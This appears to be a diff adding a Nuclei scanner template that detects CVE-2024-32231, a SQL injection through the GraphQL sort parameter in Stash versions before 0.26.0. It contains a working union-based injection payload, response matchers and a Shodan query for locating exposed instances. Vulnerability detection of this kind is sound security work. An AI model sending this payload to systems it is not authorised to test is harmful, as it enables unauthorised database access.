Create CVE-2024-32231.yaml

http/cves/2024/CVE-2024-32231.yaml

@@ -0,0 +1,48 @@
+id: CVE-2024-32231
+
+info:
+  name: Stash < 0.26.0 -  SQL Injection
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: critical
+  description: |
+    Stash up to v0.25.1 was discovered to contain a SQL injection vulnerability via the sort parameter.
+  reference:
+    - https://github.com/stashapp
+    - https://github.com/stashapp/stash
+    - https://github.com/stashapp/stash/pull/4865
+    - https://github.com/advisories/GHSA-75jf-52jg-qqh4
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-32231
+  classification:
+    cve-id: CVE-2024-32231
+    epss-score: 0.00045
+    epss-percentile: 0.16348
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: html:"<title>Stash</title>"
+  tags: cve,cve2024,stash,sqli
+
+http:
+  - raw:
+      - |
+        POST /graphql HTTP/1.1
+        Host: {{Hostname}}
+        Content-type: application/json
+
+        {"operationName":"FindPerformers","variables":{"filter":{"q":"","page":1,"per_page":40,"sort":"name;select performers.id FROM performers union select group_concat(sqlite_version(),':')-- -","direction":"ASC"},"performer_filter":{}},"query":"query FindPerformers($filter: FindFilterType, $performer_filter: PerformerFilterType, $performer_ids: [Int!]) {\n  findPerformers(\n    filter: $filter\n    performer_filter: $performer_filter\n    performer_ids: $performer_ids\n  ) {\n    count\n    performers {\n      ...PerformerData\n      __typename\n    }\n    __typename\n  }\n}\n\nfragment PerformerData on Performer {\n  id\n  name\n  disambiguation\n  url\n  gender\n  twitter\n  instagram\n  birthdate\n  ethnicity\n  country\n  eye_color\n  height_cm\n  measurements\n  fake_tits\n  penis_length\n  circumcised\n  career_length\n  tattoos\n  piercings\n  alias_list\n  favorite\n  ignore_auto_tag\n  image_path\n  scene_count\n  image_count\n  gallery_count\n  movie_count\n  performer_count\n  o_counter\n  tags {\n    ...SlimTagData\n    __typename\n  }\n  stash_ids {\n    stash_id\n    endpoint\n    __typename\n  }\n  rating100\n  details\n  death_date\n  hair_color\n  weight\n  __typename\n}\n\nfragment SlimTagData on Tag {\n  id\n  name\n  aliases\n  image_path\n  parent_count\n  child_count\n  __typename\n}"}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - 'converting driver\.Value type string \(\\"3.*?\\"\) to a int: invalid syntax'
+
+      - type: word
+        part: content_type
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200